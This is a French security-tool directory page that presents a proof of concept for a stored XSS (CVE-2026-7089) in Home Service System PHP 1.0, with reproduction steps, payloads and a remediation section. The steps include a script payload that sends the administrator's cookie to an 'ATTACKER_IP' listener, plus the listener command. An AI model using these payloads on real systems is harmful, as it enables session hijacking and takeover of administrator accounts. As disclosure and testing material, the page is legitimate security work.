Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-7089-XSS — Preuve de concept pour CVE-2026-7089, une XSS stockée dans Home Service System PHP 1.0 permettant le détournement de session administrateur sans authentification via le formulaire de réservation. | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-7089-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

Preuve de concept pour CVE-2026-7089, une XSS stockée dans Home Service System PHP 1.0 permettant le détournement de session administrateur sans authentification via le formulaire de réservation.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

home-service-system-unauth-stored-xss-admin-takeover

Détails de la vulnérabilité

ChampDétails
Fournisseurcode-projects.org
ProduitHome Service System In PHP
Version1.0
Type de vulnérabilitéCross-Site Scripting stocké (XSS)
CWECWE-79
Authentification requiseNon
AuteurImad Alvi

Description

Une vulnérabilité de Cross-Site Scripting stocké (XSS) existe dans le fichier booking.php de Home Service System In PHP 1.0. Les utilisateurs non authentifiés peuvent injecter des charges utiles JavaScript malveillantes via les champs du formulaire de réservation. L'entrée non assainie est stockée dans la base de données et rendue sans encodage de sortie dans le panneau d'administration (admin.php), où elle s'exécute dans le contexte du navigateur de l'administrateur.

Cela permet à un attaquant non authentifié de voler le cookie de session de l'administrateur, d'effectuer des actions au nom de l'administrateur, ou de compromettre entièrement le compte administrateur.


Composant affecté

  • Fichier : booking.php
  • Paramètres : fname, lname
  • Point de chute : admin.php → Gérer les réservations

Étapes pour reproduire

  1. Accédez à la page de réservation en tant qu'utilisateur non authentifié : http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. Dans le champ Prénom, injectez la charge utile suivante :

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. Remplissez les champs restants avec des données valides et soumettez la réservation.

  2. Démarrez un écouteur sur votre machine d'attaquant :

root@kitploit:~
php -S 0.0.0.0:PORT
  1. Attendez que l'administrateur visite la section Gérer les réservations dans admin.php.

  2. La charge utile s'exécute dans le navigateur de l'administrateur, exfiltration le cookie de session vers votre écouteur.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

Preuve de concept

Charge utile (Alerte)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

Charge utile (Détournement de session)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

Impact

Cette vulnérabilité permet à un attaquant distant non authentifié de compromettre entièrement l'application.

Un attaquant peut :

  • Exécuter du JavaScript arbitraire dans le navigateur de l'administrateur
  • Voler le cookie de session PHPSESSID de l'administrateur
  • Détourner la session de l'administrateur et obtenir un accès administratif complet
  • Effectuer toute action administrative (gérer les réservations, les prestataires, etc.)

Cela entraîne une compromission complète de l'application.

Remédiation

  • Appliquez htmlspecialchars() avec ENT_QUOTES sur toutes les entrées fournies par l'utilisateur avant le stockage ou le rendu
  • Implémentez un en-tête de politique de sécurité du contenu (CSP)
  • Validez et assainissez toutes les entrées de formulaire côté serveur

Références

  • Home Service System In PHP - code-projects.org
Télécharger l’outil